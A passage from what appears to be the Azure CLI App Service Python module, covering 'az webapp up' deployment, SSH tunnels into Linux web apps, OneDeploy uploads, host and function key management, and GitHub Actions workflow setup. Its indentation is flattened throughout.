"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan,
is_linux=_is_linux,
client=client)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
match = helper.resolve(runtime_version, _is_linux)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match.configs['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match.configs['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match.configs['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
_set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name)
return create_json
def _set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name):
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
logger.warning("Setting 'az webapp up' default arguments for current directory. "
"Manage defaults with 'az configure --scope local'")
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
logger.warning("--resource-group/-g default: %s", rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
logger.warning("--sku default: %s", sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
logger.warning("--plan/-p default: %s", plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
logger.warning("--location/-l default: %s", loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
logger.warning("--name/-n default: %s", name)
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match.configs.items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match.configs.items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(cmd=cmd, runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
